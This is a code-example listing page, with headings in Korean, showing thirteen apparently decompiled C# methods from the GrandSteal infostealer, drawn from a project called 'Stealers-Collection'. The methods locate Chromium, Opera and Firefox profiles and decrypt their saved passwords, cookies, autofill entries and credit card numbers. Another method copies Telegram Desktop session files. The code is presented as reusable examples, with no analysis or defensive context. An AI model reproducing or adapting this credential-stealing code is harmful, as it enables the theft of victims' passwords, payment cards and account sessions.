ChromiumManager, GrandSteal.Client.Data.Recovery C# (CSharp) 코드 예제들

예제 #1

0

파일 보기

        // Token: 0x060000B8 RID: 184 RVA: 0x00005BBC File Offset: 0x00003DBC
        public static Dictionary <string, string> SearchBrowsersRoots(string rootDir, string dirName, int level = 1)
        {
            Dictionary <string, string> dictionary = new Dictionary <string, string>
            {
                {
                    "Opera",
                    Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Opera Software\\Opera Stable")
                }
            };

            foreach (string path in Directory.GetDirectories(rootDir))
            {
                try
                {
                    if (level < 4)
                    {
                        DirectoryInfo directoryInfo = new DirectoryInfo(path);
                        if (directoryInfo.Name == dirName)
                        {
                            string[] array = directoryInfo.FullName.Split(new string[]
                            {
                                "AppData\\Local\\"
                            }, StringSplitOptions.RemoveEmptyEntries)[1].Split(new char[]
                            {
                                '\\'
                            }, StringSplitOptions.RemoveEmptyEntries);
                            if (array.Length != 0)
                            {
                                dictionary.Add(array[0], directoryInfo.FullName);
                            }
                        }
                        else
                        {
                            foreach (KeyValuePair <string, string> keyValuePair in ChromiumManager.SearchBrowsersRoots(directoryInfo.FullName, dirName, level + 1))
                            {
                                if (!dictionary.ContainsKey(keyValuePair.Key))
                                {
                                    dictionary.Add(keyValuePair.Key, keyValuePair.Value);
                                }
                            }
                        }
                    }
                }
                catch
                {
                }
            }
            return(dictionary);
        }

예제 #2

0

파일 보기

파일: FirefoxBase.cs 프로젝트: mstfknn/Stealers-Collection

        // Token: 0x060000E4 RID: 228 RVA: 0x00006F1C File Offset: 0x0000511C
        public static IEnumerable <BrowserCookie> ExtractCookies(string profile)
        {
            List <BrowserCookie> list = new List <BrowserCookie>();

            try
            {
                string text = Path.Combine(profile, "cookies.sqlite");
                if (!File.Exists(text))
                {
                    return(list);
                }
                SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(text));
                Console.WriteLine(sqliteManager.ReadTable("moz_cookies"));
                for (int i = 0; i < sqliteManager.GetRowCount(); i++)
                {
                    BrowserCookie browserCookie = null;
                    try
                    {
                        browserCookie = new BrowserCookie
                        {
                            Host    = sqliteManager.GetValue(i, "host").Trim(),
                            Http    = (sqliteManager.GetValue(i, "isSecure") == "1"),
                            Path    = sqliteManager.GetValue(i, "path").Trim(),
                            Secure  = (sqliteManager.GetValue(i, "isSecure") == "1"),
                            Expires = sqliteManager.GetValue(i, "expiry").Trim(),
                            Name    = sqliteManager.GetValue(i, "name").Trim(),
                            Value   = sqliteManager.GetValue(i, "value")
                        };
                    }
                    catch
                    {
                    }
                    if (browserCookie != null)
                    {
                        list.Add(browserCookie);
                        Console.WriteLine(browserCookie);
                    }
                }
            }
            catch (Exception value)
            {
                Console.WriteLine(value);
            }
            return(list);
        }

예제 #3

0

파일 보기

        // Token: 0x060000AE RID: 174 RVA: 0x0000561C File Offset: 0x0000381C
        public static IEnumerable <BrowserCookie> ExtractCookies(string profilePath)
        {
            List <BrowserCookie> list = new List <BrowserCookie>();

            try
            {
                string text = Path.Combine(profilePath, "Cookies");
                if (!File.Exists(text))
                {
                    return(list);
                }
                SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(text));
                sqliteManager.ReadTable("cookies");
                for (int i = 0; i < sqliteManager.GetRowCount(); i++)
                {
                    BrowserCookie browserCookie = null;
                    try
                    {
                        browserCookie = new BrowserCookie
                        {
                            Host    = sqliteManager.GetValue(i, "host_key").Trim(),
                            Http    = (sqliteManager.GetValue(i, "httponly") == "1"),
                            Path    = sqliteManager.GetValue(i, "path").Trim(),
                            Secure  = (sqliteManager.GetValue(i, "secure") == "1"),
                            Expires = sqliteManager.GetValue(i, "expires_utc").Trim(),
                            Name    = sqliteManager.GetValue(i, "name").Trim(),
                            Value   = ChromiumManager.DecryptBlob(sqliteManager.GetValue(i, "encrypted_value"), DataProtectionScope.CurrentUser, null, false).Trim()
                        };
                    }
                    catch
                    {
                    }
                    if (browserCookie != null)
                    {
                        list.Add(browserCookie);
                    }
                }
            }
            catch
            {
            }
            return(list);
        }

예제 #4

0

파일 보기

        // Token: 0x060000B3 RID: 179 RVA: 0x0000598C File Offset: 0x00003B8C
        public static BrowserCredendtial OldChromeCredential(SQLiteManager manager, int row)
        {
            BrowserCredendtial browserCredendtial = new BrowserCredendtial();

            try
            {
                browserCredendtial.URL      = manager.GetValue(row, "origin_url").Trim();
                browserCredendtial.Login    = manager.GetValue(row, "username_value").Trim();
                browserCredendtial.Password = ChromiumManager.DecryptBlob(manager.GetValue(row, "password_value"), DataProtectionScope.CurrentUser, null, false).Trim();
            }
            catch
            {
            }
            finally
            {
                browserCredendtial.Login    = (string.IsNullOrEmpty(browserCredendtial.Login) ? "UNKNOWN" : browserCredendtial.Login);
                browserCredendtial.Password = (string.IsNullOrEmpty(browserCredendtial.Password) ? "UNKNOWN" : browserCredendtial.Password);
                browserCredendtial.URL      = (string.IsNullOrEmpty(browserCredendtial.URL) ? "UNKNOWN" : browserCredendtial.URL);
            }
            return(browserCredendtial);
        }

예제 #5

0

파일 보기

        // Token: 0x060000B0 RID: 176 RVA: 0x00005858 File Offset: 0x00003A58
        public static IEnumerable <BrowserCreditCard> ExtractCreditCards(string profilePath)
        {
            List <BrowserCreditCard> list = new List <BrowserCreditCard>();

            try
            {
                string text = Path.Combine(profilePath, "Web Data");
                if (!File.Exists(text))
                {
                    return(list);
                }
                SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(text));
                sqliteManager.ReadTable("credit_cards");
                for (int i = 0; i < sqliteManager.GetRowCount(); i++)
                {
                    BrowserCreditCard browserCreditCard = null;
                    try
                    {
                        browserCreditCard = new BrowserCreditCard
                        {
                            Holder          = sqliteManager.GetValue(i, "name_on_card").Trim(),
                            ExpirationMonth = Convert.ToInt32(sqliteManager.GetValue(i, "expiration_month").Trim()),
                            ExpirationYear  = Convert.ToInt32(sqliteManager.GetValue(i, "expiration_year").Trim()),
                            CardNumber      = ChromiumManager.DecryptBlob(sqliteManager.GetValue(i, "card_number_encrypted"), DataProtectionScope.CurrentUser, null, false).Trim()
                        };
                    }
                    catch
                    {
                    }
                    if (browserCreditCard != null)
                    {
                        list.Add(browserCreditCard);
                    }
                }
            }
            catch
            {
            }
            return(list);
        }

예제 #6

0

파일 보기

파일: TelegramManager.cs 프로젝트: yaskin/Stealers-Collection

        // Token: 0x060000F7 RID: 247 RVA: 0x00007B4C File Offset: 0x00005D4C
        public static TelegramSession Extract()
        {
            TelegramSession telegramSession = new TelegramSession();

            try
            {
                string path  = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Telegram Desktop\\tdata");
                string path2 = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Telegram Desktop\\tdata\\D877F783D5D3EF8C");
                if (!Directory.Exists(path) || !Directory.Exists(path2))
                {
                    return(telegramSession);
                }
                string[] files = Directory.GetFiles(path, "D877F783D5D3EF8C*");
                if (files.Length != 0)
                {
                    byte[]   fileData = File.ReadAllBytes(ChromiumManager.CreateTempCopy(files[0]));
                    string[] files2   = Directory.GetFiles(path2, "map*");
                    if (files2.Length != 0)
                    {
                        byte[] fileData2 = File.ReadAllBytes(ChromiumManager.CreateTempCopy(files[0]));
                        telegramSession.MapFile = new DesktopFile
                        {
                            FileData = fileData2,
                            Filename = new FileInfo(files2[0]).Name
                        };
                        telegramSession.RootFile = new DesktopFile
                        {
                            FileData = fileData,
                            Filename = new FileInfo(files[0]).Name
                        };
                    }
                }
            }
            catch (Exception)
            {
            }
            return(telegramSession);
        }

예제 #7

0

파일 보기

        // Token: 0x060000AF RID: 175 RVA: 0x00005790 File Offset: 0x00003990
        public static IEnumerable <BrowserAutofill> ExtractAutofills(string profilePath)
        {
            List <BrowserAutofill> list = new List <BrowserAutofill>();

            try
            {
                string text = Path.Combine(profilePath, "Web Data");
                if (!File.Exists(text))
                {
                    return(list);
                }
                SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(text));
                sqliteManager.ReadTable("autofill");
                for (int i = 0; i < sqliteManager.GetRowCount(); i++)
                {
                    BrowserAutofill browserAutofill = null;
                    try
                    {
                        browserAutofill = new BrowserAutofill
                        {
                            Name  = sqliteManager.GetValue(i, "name").Trim(),
                            Value = sqliteManager.GetValue(i, "value").Trim()
                        };
                    }
                    catch
                    {
                    }
                    if (browserAutofill != null)
                    {
                        list.Add(browserAutofill);
                    }
                }
            }
            catch
            {
            }
            return(list);
        }

예제 #8

0

파일 보기

파일: FirefoxBase.cs 프로젝트: mstfknn/Stealers-Collection

        // Token: 0x060000E5 RID: 229 RVA: 0x00007090 File Offset: 0x00005290
        private static IEnumerable <BrowserCredendtial> ExtractLogins(string profile, byte[] privateKey)
        {
            List <BrowserCredendtial> list = new List <BrowserCredendtial>();

            try
            {
                string path = ChromiumManager.CreateTempCopy(Path.Combine(profile, "logins.json"));
                if (!File.Exists(path))
                {
                    return(list);
                }
                RootLogin rootLogin = File.ReadAllText(path).FromJSON <RootLogin>();
                Asn1Der   asn1Der   = new Asn1Der();
                foreach (LoginJson loginJson in rootLogin.logins)
                {
                    Asn1DerObject      asn1DerObject      = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedUsername));
                    Asn1DerObject      asn1DerObject2     = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedPassword));
                    string             text               = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject.objects[0].objects[1].objects[1].Data, asn1DerObject.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
                    string             text2              = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject2.objects[0].objects[1].objects[1].Data, asn1DerObject2.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
                    BrowserCredendtial browserCredendtial = new BrowserCredendtial
                    {
                        URL      = (string.IsNullOrEmpty(loginJson.hostname) ? "UNKNOWN" : loginJson.hostname),
                        Login    = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
                        Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
                    };
                    if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
                    {
                        list.Add(browserCredendtial);
                    }
                }
            }
            catch (Exception value)
            {
                Console.WriteLine(value);
            }
            return(list);
        }

예제 #9

0

파일 보기

        // Token: 0x060000AD RID: 173 RVA: 0x0000550C File Offset: 0x0000370C
        public static IEnumerable <BrowserCredendtial> ExtractCredentials(string profilePath)
        {
            List <BrowserCredendtial> list = new List <BrowserCredendtial>();

            try
            {
                string text  = Path.Combine(profilePath, "Ya Login Data");
                string text2 = Path.Combine(profilePath, "Login Data");
                if (!File.Exists(text) && !File.Exists(text2))
                {
                    return(list);
                }
                string        filePath      = (!File.Exists(text)) ? text2 : text;
                string        empty         = string.Empty;
                SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(filePath));
                sqliteManager.ReadTable("logins");
                for (int i = 0; i < sqliteManager.GetRowCount(); i++)
                {
                    BrowserCredendtial browserCredendtial = new BrowserCredendtial();
                    try
                    {
                        browserCredendtial = ChromiumManager.OldChromeCredential(sqliteManager, i);
                    }
                    catch
                    {
                    }
                    if (browserCredendtial.Login.IsNotNull <string>() && browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
                    {
                        list.Add(browserCredendtial);
                    }
                }
            }
            catch
            {
            }
            return(list);
        }

예제 #10

0

파일 보기

파일: FirefoxBase.cs 프로젝트: mstfknn/Stealers-Collection

        // Token: 0x060000E3 RID: 227 RVA: 0x00006E88 File Offset: 0x00005088
        public static IEnumerable <BrowserCredendtial> ExtractCredentials(string profile)
        {
            List <BrowserCredendtial> list = new List <BrowserCredendtial>();

            try
            {
                if (File.Exists(Path.Combine(profile, "key3.db")))
                {
                    list.AddRange(FirefoxBase.ExtractLogins(profile, FirefoxBase.ExtractPrivateKey3(ChromiumManager.CreateTempCopy(Path.Combine(profile, "key3.db")))));
                }
                if (File.Exists(Path.Combine(profile, "key4.db")))
                {
                    list.AddRange(FirefoxBase.ExtractLogins(profile, FirefoxBase.ExtractPrivateKey4(ChromiumManager.CreateTempCopy(Path.Combine(profile, "key4.db")))));
                }
            }
            catch (Exception value)
            {
                Console.WriteLine(value);
            }
            return(list);
        }

예제 #11

0

파일 보기

 // Token: 0x060000B9 RID: 185 RVA: 0x00002625 File Offset: 0x00000825
 public static string DecryptBlob(string EncryptedData, DataProtectionScope dataProtectionScope, byte[] entropy = null, bool yandex = false)
 {
     return(ChromiumManager.DecryptBlob(Encoding.Default.GetBytes(EncryptedData), dataProtectionScope, entropy, yandex));
 }

예제 #12

0

파일 보기

        // Token: 0x060000AC RID: 172 RVA: 0x00005128 File Offset: 0x00003328
        public IEnumerable <BrowserProfile> GetAll()
        {
            List <BrowserProfile> list = new List <BrowserProfile>();

            try
            {
                foreach (KeyValuePair <string, string> keyValuePair in this.BrowsersRoot)
                {
                    try
                    {
                        if (keyValuePair.Key != "Opera")
                        {
                            using (IEnumerator <string> enumerator2 = ChromiumManager.ExtractProfiles(keyValuePair.Value).GetEnumerator())
                            {
                                while (enumerator2.MoveNext())
                                {
                                    string text = enumerator2.Current;
                                    try
                                    {
                                        BrowserProfile browserProfile = new BrowserProfile
                                        {
                                            Name                = ChromiumManager.BrowserName(keyValuePair.Value),
                                            Profile             = ChromiumManager.ProfileName(text),
                                            BrowserCookies      = new List <BrowserCookie>(ChromiumManager.ExtractCookies(text).IsNull <IEnumerable <BrowserCookie> >()).IsNull <List <BrowserCookie> >(),
                                            BrowserCredendtials = new List <BrowserCredendtial>(ChromiumManager.ExtractCredentials(text).IsNull <IEnumerable <BrowserCredendtial> >()).IsNull <List <BrowserCredendtial> >(),
                                            BrowserAutofills    = new List <BrowserAutofill>(ChromiumManager.ExtractAutofills(text).IsNull <IEnumerable <BrowserAutofill> >()).IsNull <List <BrowserAutofill> >(),
                                            BrowserCreditCards  = new List <BrowserCreditCard>(ChromiumManager.ExtractCreditCards(text).IsNull <IEnumerable <BrowserCreditCard> >()).IsNull <List <BrowserCreditCard> >()
                                        };
                                        if (browserProfile.BrowserCookies.Count((BrowserCookie x) => x.IsNotNull <BrowserCookie>()) <= 0)
                                        {
                                            if (browserProfile.BrowserCredendtials.Count((BrowserCredendtial x) => x.IsNotNull <BrowserCredendtial>()) <= 0)
                                            {
                                                if (browserProfile.BrowserCreditCards.Count((BrowserCreditCard x) => x.IsNotNull <BrowserCreditCard>()) <= 0)
                                                {
                                                    if (browserProfile.BrowserAutofills.Count((BrowserAutofill x) => x.IsNotNull <BrowserAutofill>()) <= 0)
                                                    {
                                                        continue;
                                                    }
                                                }
                                            }
                                        }
                                        list.Add(browserProfile);
                                    }
                                    catch
                                    {
                                    }
                                }
                                continue;
                            }
                        }
                        BrowserProfile browserProfile2 = new BrowserProfile
                        {
                            Name                = keyValuePair.Key,
                            Profile             = "Default",
                            BrowserCookies      = new List <BrowserCookie>(ChromiumManager.ExtractCookies(keyValuePair.Value).IsNull <IEnumerable <BrowserCookie> >()).IsNull <List <BrowserCookie> >(),
                            BrowserCredendtials = new List <BrowserCredendtial>(ChromiumManager.ExtractCredentials(keyValuePair.Value).IsNull <IEnumerable <BrowserCredendtial> >()).IsNull <List <BrowserCredendtial> >(),
                            BrowserAutofills    = new List <BrowserAutofill>(ChromiumManager.ExtractAutofills(keyValuePair.Value).IsNull <IEnumerable <BrowserAutofill> >()).IsNull <List <BrowserAutofill> >(),
                            BrowserCreditCards  = new List <BrowserCreditCard>(ChromiumManager.ExtractCreditCards(keyValuePair.Value).IsNull <IEnumerable <BrowserCreditCard> >()).IsNull <List <BrowserCreditCard> >()
                        };
                        if (browserProfile2.BrowserCookies.Count((BrowserCookie x) => x.IsNotNull <BrowserCookie>()) <= 0)
                        {
                            if (browserProfile2.BrowserCredendtials.Count((BrowserCredendtial x) => x.IsNotNull <BrowserCredendtial>()) <= 0)
                            {
                                if (browserProfile2.BrowserCreditCards.Count((BrowserCreditCard x) => x.IsNotNull <BrowserCreditCard>()) <= 0)
                                {
                                    if (browserProfile2.BrowserAutofills.Count((BrowserAutofill x) => x.IsNotNull <BrowserAutofill>()) <= 0)
                                    {
                                        continue;
                                    }
                                }
                            }
                        }
                        list.Add(browserProfile2);
                    }
                    catch
                    {
                    }
                }
            }
            catch
            {
            }
            return(list);
        }

예제 #13

0

파일 보기

 // Token: 0x060000AB RID: 171 RVA: 0x000025B6 File Offset: 0x000007B6
 public ChromiumManager(Dictionary <string, string> roots = null)
 {
     this.BrowsersRoot = (roots ?? ChromiumManager.SearchBrowsersRoots(Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Local"), "User Data", 1));
 }

C# (CSharp) GrandSteal.Client.Data.Recovery ChromiumManager 예제들